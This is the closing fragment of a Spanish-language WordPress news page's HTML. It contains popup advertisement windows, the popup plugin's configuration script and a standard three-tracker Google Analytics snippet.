				<div class="ulp-window ulp-window-middle-center" id="ulp-Fc6wyaR3UbSBvpwl" data-title="pub_05" data-width="500" data-height="500" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-308" data-left="485" data-top="-35" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-309" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2017/04/COPACA.jpg" alt="" /></div>
					</div>
				</div>
				<div class="ulp-overlay" id="ulp-nK1LWnMlboeIf6vT-overlay"></div>
				<div class="ulp-window ulp-window-middle-center" id="ulp-nK1LWnMlboeIf6vT" data-title="pub_06" data-width="500" data-height="500" data-position="middle-center" data-close="on" data-enter="on">
					<div class="ulp-content">
						<div class="ulp-layer" id="ulp-layer-310" data-left="485" data-top="-35" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><a href="#" onclick="return ulp_self_close();">×</a></div>
						<div class="ulp-layer" id="ulp-layer-311" data-left="0" data-top="0" data-appearance="fade-in" data-appearance-speed="1000" data-appearance-delay="200"  data-scrollbar="off" data-confirmation="off"><img src="http://diarioavance.com/wp-content/uploads/2017/05/Tuflete-com.jpg" alt="" /></div>
					</div>
				</div>
		<script>
			var ulp_ajax_url = "http://diarioavance.com/wp-admin/admin-ajax.php";
			var ulp_css3_enable = "on";
			var ulp_ga_tracking = "off";
			var ulp_km_tracking = "off";
			var ulp_onexit_limits = "off";
			var ulp_no_preload = "off";
			var ulp_campaigns = {"ab-6xMx4vAREokt3AQV":["HzH8vPTAVa3af6eF"],"none":[""]};
			var ulp_overlays = {"niuVwn1b9CPySnOo":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"41YmVufxOkhb1jNl":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"RqfTGVP3BftKFK8y":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"W1FjwTdKrIeT5hWg":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"bTlNF2NKQJbxv1c5":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"WKcTEhZnnJacRYh8":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"yo1wXiOeRCKVz1vH":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"4KgFqV41Og2y9q6V":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"ok89R2E8ChwGHw4b":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"GB4c7clq4xHtA9Jl":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"HicVq5S45lSnQp8M":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"XgepN3M9GVsCyRDp":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"V8zLOVXuWIb4jRVl":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"ztyA1ZH8hx2jtr6g":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"GLde9uss21XXvCLq":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"ywD2UX5GnJSEweVO":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"iFCuwakBbBFbebOp":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"W4XhlQCqhH18uouL":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"Ryif2XKkLJd6GtGT":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"klPFs3kF9g6UGdls":["#333333", "0.9", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"qsQeqzJJRpdO8udg":["#333333", "0.8", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"rakLFdtaqmrKSmko":["#333333", "0.8", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"HzH8vPTAVa3af6eF":["#333333", "0.8", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"uvHkPoPeBPZxu5Tq":["#333333", "0.8", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"oKRYtinqs8TaFpLJ":["#333333", "0.8", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"TtxNTrN72gnsT4Dx":["#333333", "0.8", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"Fc6wyaR3UbSBvpwl":["#333333", "0.8", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"nK1LWnMlboeIf6vT":["#333333", "0.8", "on", "middle-center", "fadeIn", "classic", "#ffffff"],"none":["", "", "", "", ""]};
			if (typeof ulp_inline_open == "function" && typeof ulp_init == "function") { 
				ulp_prepare_ids(); ulp_inline_open(false); ulp_init(); jQuery(document).ready(function() {ulp_ready();});
			} else {
				jQuery(document).ready(function(){ulp_prepare_ids(); ulp_inline_open(false); ulp_init(); ulp_ready();});
			}
		</script>	<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

// Codigo por defecto Google Analytics.
ga('create', 'UA-1083530-14', 'auto');
// ID de Google Analytics de la segunda cuenta. ('b').
ga('create', 'UA-57271490-1', {'name':'b'});
// ID de Google Analytics de la tercera cuenta. ('c').
ga('create', 'UA-36743253-2', {'name':'c'});
// Esto es lo que nos da Google Analytics por defecto.
ga('send', 'pageview');
// Codigo de seguimiento 'b'
ga('b.send', 'pageview');
// Codigo de seguimiento 'c' 
ga('c.send', 'pageview');
</script> 












































































</body>
</html>